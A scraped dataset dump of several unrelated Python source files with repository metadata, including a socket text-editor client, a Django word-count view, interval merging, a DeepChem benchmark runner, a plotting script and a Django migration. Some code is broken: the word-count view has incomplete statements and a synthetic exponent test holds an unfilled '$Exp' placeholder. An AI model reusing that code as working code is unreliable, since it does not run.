del self.arr[index-1]
wrap_count -= 1
elif char == '\n' or wrap_count * 8 >= self.screen_width:
self.screen.append([''])
cursor_commands.append('down')
row += 1
wrap_count = 0
else:
self.screen[row].append(char)
cursor_commands.append('right')
wrap_count += 1
if self.update_cursor:
self.cursor.screen = self.screen
for cursor_mov in cursor_commands:
self.cursor.move(cursor_mov)
def render(self):
if self.cursor.pos['row'] == len(self.screen)-1 and self.cursor.pos['col'] == len(self.screen[-1])-1:
self.update_cursor = True
self.screen = [[""]]
self.array_to_screen()
text_on_screen = 'clear\n'
top_pad = 0
left_pad = 0
for row in self.screen:
text = ''.join(row)
text_on_screen += 'text,0,{},#000000,{}\n'.format(top_pad, text)
top_pad += 14
text_on_screen += self.cursor.pos_to_command()
return text_on_screen
def parse_data(data):
parsed_data = data.strip('\n').lower().split(',')
if len(parsed_data) == 2 and 'keydown' == parsed_data[0]:
Key = collections.namedtuple('key', ['value'])
return Key(parsed_data[1])
elif len(parsed_data) == 3 and 'resize' in parsed_data[0]:
Window = collections.namedtuple('window', ['width','height'])
return Window(int(parsed_data[1]), int(parsed_data[2]))
# Create a socket for the server on localhost
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost',5005)
client_socket.connect(server_address)
text_editor = TextEditor()
while True:
data = client_socket.recv(16)
command = parse_data(data)
if command:
text_editor.perform_command(command)
client_socket.send(text_editor.render())
| [
"cmm892@stern.nyu.edu"
] | cmm892@stern.nyu.edu |
27cc29c1b018fb31b488d657b6253e7b2e3dd98b | 08a68e32dc80f99a37a30ddbbf943337546cc3d5 | /.history/count/views_20200419210126.py | 7d44fedad1258f480a5d74dbc0f4f7fcd2ccf24d | [] | no_license | Space20001/word-count-project | dff1b4b44d2f7230070eef0d95dd968b655d92f7 | 795b5e8ad5c59109e96bf7a8e9192efaefa7770e | refs/heads/master | 2022-04-20T17:54:05.511449 | 2020-04-20T15:25:46 | 2020-04-20T15:25:46 | 257,327,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | from django.shortcuts import render
# Create your views here.
def home(request):
return render(request, 'count/home.html', {})
def counted(request):
fulltext = request.GET['fulltext']
wordlist = fulltext.split()
for word in wordlist:
worddictionary
for word in wordlist:
if word in worddictionary:
else
word
return render(request, 'count/counted.html', {'fulltext': fulltext, 'count': len(wordlist)})
def about(request):
return render(request, 'count/about.html', {about: 'about'})
| [
"steve.h@blueyonder.com"
] | steve.h@blueyonder.com |
9e7e128d4c376e8aa17e5ff01c2b2c8a16b2cbab | 2db7597686f33a0d700f7082e15fa41f830a45f0 | /Python/巨硬/A37.区间问题-并集.py | 2c9d8793447aa0422993aab6fd38fe6b6ec1ba3e | [] | no_license | Leahxuliu/Data-Structure-And-Algorithm | 04e0fc80cd3bb742348fd521a62bc2126879a70e | 56047a5058c6a20b356ab20e52eacb425ad45762 | refs/heads/master | 2021-07-12T23:54:17.785533 | 2021-05-17T02:04:41 | 2021-05-17T02:04:41 | 246,514,421 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | '''
给定一个interval A和一组intervals,然后判断这组intervals里面是否存在一个并集是这个A的超集
'''
'''
[[2, 4], [5, 6],[3,5]]
[1, 4]
一组intervals合并之后,并没有一个区间是可以把[1,4]包括在里面的
'''
# merge
# 56
def merge(intervals):
if len(intervals) < 2:
return intervals
intervals = sorted(intervals, key = lambda x:x[0])
new = [intervals[0]]
for start, end in intervals[1:]:
if start <= new[-1][1]:
new[-1][1] = max(end, new[-1][1])
else:
new.append([start, end])
return new
# include or not
# 1288
def covered(A, intervals):
for start, end in intervals:
if A[0] >= start and A[1] <= end:
return True
return False
intervals = merge([[2, 4], [5, 6],[3,5]])
print(intervals)
print(covered([1, 4], intervals))
print(covered([2, 6], intervals)) | [
"leahxuliu@gmail.com"
] | leahxuliu@gmail.com |
8bf45cd71206323b9373447e206269a9e9297742 | 9678fc0229de38f419964247ba0c8c8c395756c6 | /deepchem/molnet/run_benchmark_low_data.py | 840bbc53115f807459fd91aab7eb0417f47772ed | [
"MIT"
] | permissive | ozgurozkan123/deepchem | 2c3af9022de583b7dc77affce599dfb7b3a0dd81 | 7b6248db5f7172ff2a833a1c7c99f48565befe67 | refs/heads/master | 2023-01-23T11:40:34.545571 | 2017-09-28T21:41:53 | 2017-09-28T21:41:53 | 105,562,133 | 0 | 0 | MIT | 2020-11-14T23:00:38 | 2017-10-02T17:14:51 | Python | UTF-8 | Python | false | false | 4,981 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 06 14:25:40 2017
@author: Zhenqin Wu
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
import time
import csv
import numpy as np
import tensorflow as tf
import deepchem
from deepchem.molnet.run_benchmark_models import low_data_benchmark_classification
from deepchem.molnet.check_availability import CheckFeaturizer
def run_benchmark_low_data(datasets,
model,
split='task',
metric=None,
featurizer=None,
n_features=0,
out_path='.',
K=4,
hyper_parameters=None,
cross_valid=False,
seed=123):
"""
Run low data benchmark test on designated datasets
with deepchem(or user-defined) model
Parameters
----------
datasets: list of string
choice of which datasets to use, should be: muv, tox21, sider
model: string or user-defined model stucture
choice of which model to use, should be: siamese, attn, res
split: string, optional (default='task')
choice of splitter function, only task splitter supported
metric: string, optional (default=None)
choice of evaluation metrics, None = using the default metrics(AUC)
featurizer: string or dc.feat.Featurizer, optional (default=None)
choice of featurization, None = using the default corresponding to model
(string only applicable to deepchem models)
n_features: int, optional(default=0)
depending on featurizers, redefined when using deepchem featurizers,
need to be specified for user-defined featurizers(if using deepchem models)
out_path: string, optional(default='.')
path of result file
K: int, optional(default=4)
K-fold splitting of datasets
hyper_parameters: dict, optional (default=None)
hyper parameters for designated model, None = use preset values
cross_valid: boolean, optional(default=False)
whether to cross validate
"""
for dataset in datasets:
if dataset in ['muv', 'sider', 'tox21']:
mode = 'classification'
if metric == None:
metric = str('auc')
else:
raise ValueError('Dataset not supported')
metric_all = {
'auc': deepchem.metrics.Metric(deepchem.metrics.roc_auc_score, np.mean)
}
if isinstance(metric, str):
metric = metric_all[metric]
if featurizer == None and isinstance(model, str):
# Assigning featurizer if not user defined
pair = (dataset, model)
if pair in CheckFeaturizer:
featurizer = CheckFeaturizer[pair][0]
n_features = CheckFeaturizer[pair][1]
else:
continue
loading_functions = {
'muv': deepchem.molnet.load_muv,
'sider': deepchem.molnet.load_sider,
'tox21': deepchem.molnet.load_tox21
}
assert split == 'task'
print('-------------------------------------')
print('Benchmark on dataset: %s' % dataset)
print('-------------------------------------')
# loading datasets
print('Splitting function: %s' % split)
tasks, all_dataset, transformers = loading_functions[dataset](
featurizer=featurizer, split=split, K=K)
if cross_valid:
num_iter = K # K iterations for cross validation
else:
num_iter = 1
for count_iter in range(num_iter):
# Assembling train and valid datasets
train_folds = all_dataset[:K - count_iter - 1] + all_dataset[K -
count_iter:]
train_dataset = deepchem.splits.merge_fold_datasets(train_folds)
valid_dataset = all_dataset[K - count_iter - 1]
time_start_fitting = time.time()
train_score = {}
valid_score = {}
if isinstance(model, str):
if mode == 'classification':
valid_score = low_data_benchmark_classification(
train_dataset,
valid_dataset,
n_features,
metric,
model=model,
hyper_parameters=hyper_parameters,
seed=seed)
else:
model.fit(train_dataset)
valid_score['user_defined'] = model.evaluate(valid_dataset, metric,
transformers)
time_finish_fitting = time.time()
with open(os.path.join(out_path, 'results.csv'), 'a') as f:
writer = csv.writer(f)
for i in valid_score:
output_line = [dataset, str(split), mode, 'valid', i]
for task in valid_score[i][0]:
output_line.extend(
[task, valid_score[i][0][task], valid_score[i][1][task]])
output_line.extend(
['time_for_running', time_finish_fitting - time_start_fitting])
writer.writerow(output_line)
| [
"zqwu@stanford.edu"
] | zqwu@stanford.edu |
1ee5d551c1a0a33fe0978fbc6df59855ac744636 | ded0c895f6e1f8853f2222ae498bdc7ae52ef0e4 | /week-06/rise-time_resistenza.py | 1c1a0eb0e395c940b322ecaea9ffa6fd256801de | [] | no_license | LorenzoLMP/TD2015 | 6a8846b4592b32db81338b8522a10a2dc52531c1 | e39b51d48149d07c3cea682a02eeec4e69ffbabd | refs/heads/master | 2021-01-17T14:47:20.378339 | 2016-05-31T11:33:50 | 2016-05-31T11:33:50 | 43,302,288 | 0 | 0 | null | 2015-09-28T13:58:46 | 2015-09-28T13:23:45 | null | UTF-8 | Python | false | false | 1,077 | py | from pylab import *
from scipy import *
from scipy import optimize
from scipy import misc
#data = genfromtxt('es4_flash_mod')
#data1 = genfromtxt('es4_signal50hz_def1')
#xdata = [1, 10, 98.2, 654, 2200, 14.8, 32.6, 67.1, 46.1]#kOhm
xdata = [1, 10, 14.8, 32.6, 46.1, 67.1, 98.2, 654, 2200]
ydata = [15, 34, 44, 88, 120, 190, 256, 176, 92]
#ydata = [15, 34, 256, 176, 92, 44, 88, 190, 120] #us
sigmax = [0.008, 0.08, 0.98, 6.54, 22, 0.148, 0.326, 0.671, 0.461]
sigmax.sort()
sigmay = []
for i in range(len(ydata)):
sigmay.append(4)
#sigmay = array(sigmay)
###Parte per plot dati
grid('on', which = "both")
title(r"Andamento del rise-time $[\mu s]$ in funzione di R $[k\Omega]$", size = 15)
plot(xdata, ydata, '--', color="black")
##title("LED880", size = 15)
errorbar(xdata, ydata, sigmay, sigmax, linestyle="None" , marker=".", color="red", markersize= 10)
#xscale('log')
#yscale('log')
xlim(0,120)
xlabel(r'Resistenza $[k\Omega]$')
ylabel(r's $[\mu]$s')
rc('font', size=15)
#minorticks_on()
#grid('on', which = "both")
savefig('rise_time_1-100', dpi=400)
show()
| [
"lorenzo.perrone.lmp@gmail.com"
] | lorenzo.perrone.lmp@gmail.com |
1bdb45ae6c22c3c4ce32fcf8b377085dde619b34 | b78ef082335b0a901b3f028746055fc6308990a2 | /Algorithms/Leetcode/904 - Fruit Into Baskets.py | 9d9164a2cca2a82732629e128b6bedd9c261103f | [] | no_license | timpark0807/self-taught-swe | 1a968eab63f73cea30ef2379ffab53980743ed1a | bbfee57ae89d23cd4f4132fbb62d8931ea654a0e | refs/heads/master | 2021-08-14T23:31:14.409480 | 2021-08-10T06:36:06 | 2021-08-10T06:36:06 | 192,797,733 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | import collections
class Solution(object):
def totalFruit(self, tree):
"""
:type tree: List[int]
:rtype: int
"""
left = 0
right = 0
max_subarray = 0
count = collections.defaultdict(int)
while right < len(tree):
count[tree[right]] += 1
if len(count) > 2:
max_subarray = max(max_subarray, right - left)
while len(count) > 2:
count[tree[left]] -= 1
if count[tree[left]] == 0:
del count[tree[left]]
left += 1
right += 1
max_subarray = max(max_subarray, right - left)
return max_subarray
| [
"timpark0807@gmail.com"
] | timpark0807@gmail.com |
5a27886f080eaee5bc8cd830fd82568adc821010 | c0f022b3ff454435c3cda9dea25fae9f2765ddeb | /build_helpers.py | 903445e3ed32be514efec90ac18553c42ff92115 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | fos/fos | fabe3786f4963803f6e1285dd102c5d81b534e66 | 8d33bf0cd60292ad5164973b5285122acbc03b86 | refs/heads/master | 2016-09-06T12:52:45.011875 | 2014-11-11T09:19:38 | 2014-11-11T09:19:38 | 2,089,645 | 5 | 0 | null | 2014-11-11T09:19:39 | 2011-07-22T16:57:14 | Python | UTF-8 | Python | false | false | 2,424 | py | ''' Module to automate cython building '''
import os
from os.path import join as pjoin
from distutils.extension import Extension
def make_cython_ext(modulename,
has_cython,
include_dirs=None,
extra_c_sources=None):
''' Create Cython extension builder from module names
Returns extension for building and command class depending on
whether you want to use Cython and ``.pyx`` files for building
(`has_cython` == True) or the Cython-generated C files (`has_cython`
== False).
Assumes ``pyx`` or C file has the same path as that implied by
modulename.
Parameters
----------
modulename : string
module name, relative to setup.py path, with python dot
separators, e.g mypkg.mysubpkg.mymodule
has_cython : bool
True if we have cython, False otherwise
include_dirs : None or sequence
include directories
extra_c_sources : None or sequence
sequence of strings giving extra C source files
Returns
-------
ext : extension object
cmdclass : dict
command class dictionary for setup.py
Examples
--------
You will need Cython on your python path to run these tests.
>>> modulename = 'pkg.subpkg.mymodule'
>>> ext, cmdclass = make_cython_ext(modulename, True, None,['test.c'])
>>> ext.name == modulename
True
>>> pyx_src = os.path.join('pkg', 'subpkg', 'mymodule.pyx')
>>> ext.sources == [pyx_src, 'test.c']
True
>>> import Cython.Distutils
>>> cmdclass['build_ext'] == Cython.Distutils.build_ext
True
>>> ext, cmdclass = make_cython_ext(modulename, False, None, ['test.c'])
>>> ext.name == modulename
True
>>> pyx_src = os.path.join('pkg', 'subpkg', 'mymodule.c')
>>> ext.sources == [pyx_src, 'test.c']
True
>>> cmdclass
{}
'''
if include_dirs is None:
include_dirs = []
if extra_c_sources is None:
extra_c_sources = []
if has_cython:
src_ext = '.pyx'
else:
src_ext = '.c'
pyx_src = pjoin(*modulename.split('.')) + src_ext
sources = [pyx_src] + extra_c_sources
ext = Extension(modulename, sources, include_dirs = include_dirs)
if has_cython:
from Cython.Distutils import build_ext
cmdclass = {'build_ext': build_ext}
else:
cmdclass = {}
return ext, cmdclass
| [
"garyfallidis@gmail.com"
] | garyfallidis@gmail.com |
e0c920b31fbc64e0f25a96b63931c0d7f99a10aa | dd15e2332d3e981203855b2d9d0eb723f5707410 | /triton/dns/dnssec/algorithms/__init__.py | dedbedf897c4fb434e1e9fac27f8796400fb21e0 | [
"MIT"
] | permissive | Yurzs/triton | db63540c1fdce1b11a33a4ef7f7e7a5f1498ac24 | b64424c193b131721f172f94963d8d79b21804db | refs/heads/master | 2021-07-22T20:28:11.750946 | 2019-10-13T21:47:09 | 2019-10-13T21:47:09 | 209,257,735 | 0 | 1 | MIT | 2020-11-02T14:21:54 | 2019-09-18T08:28:29 | Python | UTF-8 | Python | false | false | 185 | py | from .base import Algorithm
from .ecc import ECDSAP256SHA256, ECCGOST, ECDSAP384SHA384
from .ed import ED448, ED25519
from .rsa import RSASHA256, RSASHA1, RSASHA512, RSASHA1_NSEC3_SHA1
| [
"yurzs@icloud.com"
] | yurzs@icloud.com |
37abc4e7c8314aa9f8914a2906228494a1e1c5fc | 7c5dbe7a2df9fce39a1658c5e2b7ba9a90a9b5f7 | /长佩/wordcount.py | c14b376fbfaef2995c9350e552fc635d6be92b1c | [] | no_license | ydPro-G/Python_spiders | 9566431129cd7f8b2fabc68660111426384bfd69 | c37472c3789ce444180ee1c218f287ce3c032d50 | refs/heads/master | 2023-02-23T20:39:31.279762 | 2021-01-27T05:50:40 | 2021-01-27T05:50:40 | 289,230,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,585 | py | import re
import collections
import numpy as np
import jieba
import wordcloud
from PIL import Image
import matplotlib.pyplot as plt
fn = open('CP.txt',encoding='gbk')
string_data = fn.read()
fn.close()
# 文本预处理
pattern = re.compile(u'\t|\n|\.|-|:|;|\)|\(|\?|"') # 定义正则表达式匹配模式
string_data = re.sub(pattern, '', string_data)
# 文本分词
seg_list_exact = jieba.cut(string_data, cut_all = False) # 精确模式分词
object_list = []
remove_words = [u'的', u',',u'和', u'是', u'随着', u'对于', u'对',u'等',u'能',u'都',u'。',u' ',u'、',u'中',u'在',u'了',
u'通常',u'如果',u'我们',u'需要'] # 自定义去除词库
for word in seg_list_exact:
if word not in remove_words:
object_list.append(word)
# 词频统计
word_counts = collections.Counter(object_list) # 对分词做词频统计
word_counts_top10 = word_counts.most_common(10) # 获取前10最高频的词
print (word_counts_top10) # 输出检查
# 词频展示
mask = np.array(Image.open('wordcloud.jpg'))
wc = wordcloud.WordCloud(
font_path='C:/Windows/Fonts/simhei.ttf', # 使用字体
mask=mask,
max_words=200,
max_font_size=100, # 字体最大显示
background_color='white' # 背景颜色
)
wc.generate_from_frequencies(word_counts) # 从字典生成词云
image_colors = wordcloud.ImageColorGenerator(mask) # 从背景图建立颜色方案
wc.recolor(color_func=image_colors) # 将词云颜色设置为背景图方案
plt.imshow(wc) # 显示词云
plt.axis('off') # 关闭坐标轴
plt.show() # 显示图像 | [
"46178109+ydPro-G@users.noreply.github.com"
] | 46178109+ydPro-G@users.noreply.github.com |
3d0ad7fa61f71c0e7835ba9dcaf7f29ab2b35392 | d308fffe3db53b034132fb1ea6242a509f966630 | /pirates/piratesgui/RadarObjDef.py | e93baad8c0f3ebf9a28b6f4f2cce0a4f4849e296 | [
"BSD-3-Clause"
] | permissive | rasheelprogrammer/pirates | 83caac204965b77a1b9c630426588faa01a13391 | 6ca1e7d571c670b0d976f65e608235707b5737e3 | refs/heads/master | 2020-03-18T20:03:28.687123 | 2018-05-28T18:05:25 | 2018-05-28T18:05:25 | 135,193,362 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.piratesgui.RadarObjDef
RADAR_OBJ_TYPE_DEFAULT = 0
RADAR_OBJ_TYPE_LANDMARK = 1
RADAR_OBJ_TYPE_QUEST = 2
RADAR_OBJ_TYPE_SHIP = 3
RADAR_OBJ_TYPE_EXIT = 4
RADAR_OBJ_TYPE_TUTORIAL = 5
RADAR_OBJ_EXIT_OFFSET_Z = -0.15 | [
"33942724+itsyaboyrocket@users.noreply.github.com"
] | 33942724+itsyaboyrocket@users.noreply.github.com |
b5f49e9874ff2559737ac2b0489f54b6428617d2 | de4f038dd0de465152db16457aa37c8b4e911fb5 | /pandas/tests/indexes/period/test_scalar_compat.py | ac01b4aad81c998687bf92d67b3bbb907b4e22a2 | [
"BSD-3-Clause"
] | permissive | dr-aryone/pandas | 0350c5625fbb854049f086dabdfa198fa6d5929b | ba48fc4a033f11513fa2dd44c946e18b7bc27ad2 | refs/heads/master | 2020-05-27T06:26:23.174532 | 2019-05-25T01:18:04 | 2019-05-25T01:18:04 | 188,521,455 | 1 | 1 | BSD-3-Clause | 2019-05-25T04:42:58 | 2019-05-25T04:42:57 | null | UTF-8 | Python | false | false | 749 | py | """Tests for PeriodIndex behaving like a vectorized Period scalar"""
from pandas import Timedelta, date_range, period_range
import pandas.util.testing as tm
class TestPeriodIndexOps:
def test_start_time(self):
index = period_range(freq='M', start='2016-01-01', end='2016-05-31')
expected_index = date_range('2016-01-01', end='2016-05-31', freq='MS')
tm.assert_index_equal(index.start_time, expected_index)
def test_end_time(self):
index = period_range(freq='M', start='2016-01-01', end='2016-05-31')
expected_index = date_range('2016-01-01', end='2016-05-31', freq='M')
expected_index += Timedelta(1, 'D') - Timedelta(1, 'ns')
tm.assert_index_equal(index.end_time, expected_index)
| [
"jeff@reback.net"
] | jeff@reback.net |
e4b8582a9c46220007caab110d1113d9a128ac69 | 8dca64dd11b23a7d59413ac8e28e92a0ab80c49c | /95. Unique Binary Search Trees II/solution.py | 5880ea8112ddab5737449c11b0348372d774fdf1 | [] | no_license | huangruihaocst/leetcode-python | f854498c0a1d257698e10889531c526299d47e39 | 8f88cae7cc982ab8495e185914b1baeceb294060 | refs/heads/master | 2020-03-21T20:52:17.668477 | 2018-10-08T20:29:35 | 2018-10-08T20:29:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def generateTrees(self, n):
"""
:type n: int
:rtype: List[TreeNode]
"""
from functools import lru_cache
if n == 0:
return []
if n == 1:
return [TreeNode(1)]
@lru_cache(maxsize=None)
def generate(li): # generate a BST from a list
if len(li) == 0:
return [None]
if len(li) == 1:
return [TreeNode(li[0])]
res = list()
for i, v in enumerate(li): # val will be the root
left = generate(li[:i])
right = generate(li[i + 1:])
for left_i in range(len(left)):
for right_i in range(len(right)):
root = TreeNode(v)
root.left = left[left_i]
root.right = right[right_i]
res.append(root)
return res
return generate(range(1, n + 1))
if __name__ == '__main__':
s = Solution()
trees = s.generateTrees(2)
print(trees)
| [
"huangruihaocst@126.com"
] | huangruihaocst@126.com |
4fe2599a9c4e89e3e13d7841a707586ae6840319 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/exp-big-622.py | 3a2dac4d082b65b880dfe497b0580a46a02d08b9 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,175 | py | # Compute x**y
def exp(x: int, y: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp2(x: int, y: int, x2: int, y2: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp3(x: int, y: int, x2: int, y2: int, x3: int, y3: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if $Exp:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp4(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
def exp5(x: int, y: int, x2: int, y2: int, x3: int, y3: int, x4: int, y4: int, x5: int, y5: int) -> int:
a: int = 0
a2: int = 0
a3: int = 0
a4: int = 0
a5: int = 0
def f(i: int) -> int:
nonlocal a
nonlocal a2
nonlocal a3
nonlocal a4
nonlocal a5
def geta() -> int:
return a
if i <= 0:
return geta()
else:
a = a * x
a2 = a * x
a3 = a * x
a4 = a * x
a5 = a * x
return f(i-1)
a = 1
a2 = 1
a3 = 1
a4 = 1
a5 = 1
return f(y)
# Input parameter
n:int = 42
n2:int = 42
n3:int = 42
n4:int = 42
n5:int = 42
# Run [0, n]
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
while i <= n:
print(exp(2, i % 31))
i = i + 1 | [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
3adcb8fc1e79961d293753a37d7cbed5f201f697 | 7a4fc6e37b501a6b79a1fec3e065e63d77d5cad6 | /scripts/gpipe/exons2stats.py | 03dc2cd8cacb1c76fff9f3ebf38e1e7e451da6cf | [
"MIT"
] | permissive | bioCKO/Optic | f7d3d4164d03cff8e6a930d569d899379cb3cacf | 2df92e953b5139ff4e5c383cb4383e6367cd47f1 | refs/heads/master | 2021-05-19T15:11:21.782547 | 2015-09-22T15:46:39 | 2015-09-22T15:46:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,467 | py | ##########################################################################
#
# MRC FGU Computational Genomics Group
#
# $Id$
#
# Copyright (C) 2009 Andreas Heger
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
##########################################################################
'''
gpipe/exons2stats.py -
======================================================
:Author: Andreas Heger
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. todo::
describe purpose of the script.
Usage
-----
Example::
python gpipe/exons2stats.py --help
Type::
python gpipe/exons2stats.py --help
for command line help.
Documentation
-------------
Code
----
'''
import sys
import csv
import pgdb
import CGAT.Experiment as E
import CGAT.Exons as Exons
parser = E.OptionParser(
version="%prog version: $Id: gpipe/exons2stats.py 2781 2009-09-10 11:33:14Z andreas $")
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser.add_option("-q", "--quality", dest="quality", type="string",
help="quality categories to take into account.")
parser.add_option("-f", "--format=", dest="format", type="string",
help="input format [exons|gff|table]")
parser.add_option("-e", "--exons-file=", dest="tablename_exons", type="string",
help="table name with exons.")
parser.add_option("-p", "--predictions=", dest="tablename_predictions", type="string",
help="table name with predictions.")
parser.add_option("-n", "--non-redundant", dest="non_redundant", action="store_true",
help="only non-redundant predictions.")
parser.add_option("-s", "--schema", dest="schema", type="string",
help="schema to use.")
parser.set_defaults(
fields=["Id", "NumExons", "GeneLength", "MinExonLength",
"MaxExonLength", "MinIntronLength", "MaxIntronLength"],
tablename_exons="exons",
tablename_predictions="predictions",
quality=None,
non_redundant=False,
schema=None,
tablename_redundant="redundant",
tablename_quality="quality",
format="exons",
)
(options, args) = E.Start(
parser, add_csv_options=True, add_database_options=True)
if options.quality:
options.quality = options.quality.split(",")
if options.format == "table":
dbhandle = pgdb.connect(options.psql_connection)
exons = Exons.GetExonBoundariesFromTable(dbhandle,
options.tablename_predictions,
options.tablename_exons,
non_redundant_filter=options.non_redundant,
quality_filter=options.quality,
table_name_quality=options.tablename_quality,
table_name_redundant=options.tablename_redundant,
schema=options.schema)
else:
exons = Exons.ReadExonBoundaries(sys.stdin)
stats = Exons.CalculateStats(exons)
print "\t".join(options.fields)
writer = csv.DictWriter(sys.stdout,
options.fields,
dialect=options.csv_dialect,
lineterminator=options.csv_lineterminator,
extrasaction='ignore')
for k, v in stats.items():
v["Id"] = k
writer.writerow(v)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| [
"andreas.heger@gmail.com"
] | andreas.heger@gmail.com |
517bab109d3b890fc212b0e4e817e856b17a8744 | 889d85d5b12d099f3ba5ce0083a828181da9e973 | /2020-08-month-long-challenge/day06.py | 66769c379769d62d8db4f6ca3c7ed84d674f3460 | [
"Unlicense"
] | permissive | jkbockstael/leetcode | def0fca6605e3432b979c145979a3f3de225d870 | 8ef5c907fb153c37dc97f6524493ceca2044ea38 | refs/heads/master | 2021-05-23T08:54:15.313887 | 2020-09-24T20:53:46 | 2020-09-24T20:53:46 | 253,208,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | #!/usr/bin/env python3
# Day 6: Find All Duplicates in an Array
#
# Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array), some elements
# appear twice and others appear once.
# Find all the elements that appear twice in this array.
# Could you do it without extra space and in O(n) runtime?
class Solution:
def findDuplicates(self, nums: [int]) -> [int]:
# We have an array of length N that contains values from 1 to n, n ≤ N
# We need to keep track of the number we've already seen, for this we
# would need a list of m elements, m < ≤ n ≤ N
# This means we can actually use the input array as it is large enough,
# given that all values are positive we can flip them to negative to
# encode the seen values
duplicates = []
for number in nums:
value = abs(number) # Maybe this position has been used as a marker
seen = abs(number) - 1 # indices start at 0, values at 1
if nums[seen] < 0:
# We already found this number before
duplicates.append(value)
else:
# Mark the array for this number
nums[seen] *= -1
return duplicates
# Test
assert Solution().findDuplicates([4,3,2,7,8,2,3,1]) == [2,3]
| [
"jkb@jkbockstael.be"
] | jkb@jkbockstael.be |
51452deb12793778ae6ebbc8366f2e0842600087 | bad595a92335a51f629c9a4945d68be0a22d21ba | /src/GLC/team/migrations/0005_teamhead.py | d5938a98cfa25b6810293535af6cd8a55b2f2af2 | [] | no_license | Fabricourt/GLC | 21f0afa27b1cbc34c114b4d514b9b8637813ea24 | a1af55972141e2179742e248d6bd12bb154ca95f | refs/heads/master | 2022-12-01T05:43:56.625087 | 2019-07-14T14:33:44 | 2019-07-14T14:33:44 | 185,725,838 | 0 | 0 | null | 2022-11-22T03:48:18 | 2019-05-09T04:24:38 | CSS | UTF-8 | Python | false | false | 989 | py | # Generated by Django 2.2.1 on 2019-05-09 19:27
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('team', '0004_team_team_header'),
]
operations = [
migrations.CreateModel(
name='Teamhead',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('team_header', models.ImageField(blank=True, null=True, upload_to='home_header/')),
('logo_short_name', models.CharField(blank=True, max_length=20, null=True)),
('motivational_statement', models.CharField(blank=True, max_length=20, null=True)),
('reload', models.DateTimeField(default=django.utils.timezone.now)),
('is_published', models.BooleanField(default=True)),
],
),
]
| [
"mfalme2030@gmail.com"
] | mfalme2030@gmail.com |
